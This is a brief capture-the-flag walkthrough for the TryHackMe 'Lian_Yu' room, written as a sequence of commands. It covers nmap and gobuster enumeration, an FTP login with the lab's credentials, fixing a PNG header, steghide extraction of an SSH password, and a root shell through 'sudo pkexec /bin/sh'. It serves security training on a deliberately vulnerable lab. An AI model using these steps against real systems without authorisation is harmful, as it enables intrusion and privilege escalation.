Lian_Yu

Room Link: https://tryhackme.com/room/lianyu

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

No other ports found.

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Kali

gobuster dir -u http://$VICTIM/island -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Kali

gobuster dir -u http://$VICTIM/island/2100 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x ticket

Link: https://gchq.github.io/CyberChef/

FTP

ftp $VICTIM
Username: vigilante
Password: !#th3h00d
mget *

Kali

exiftool Leave_me_alone.png 
sudo apt install ncurses-hexedit

Change the first hex values to 89 50 4E 47 0D 0A to make it .PNG then save the file

Kali

exiftool Leave_me_alone.png

Kali

steghide info aa.jpg
Password: password

Kali

steghide extract -sf aa.jpg
Password: password
unzip ss.zip 

Kali

ssh slade@$VICTIM
Password: M3tahuman

Privilege Escalation

Victim

sudo -l

Victim

sudo pkexec /bin/sh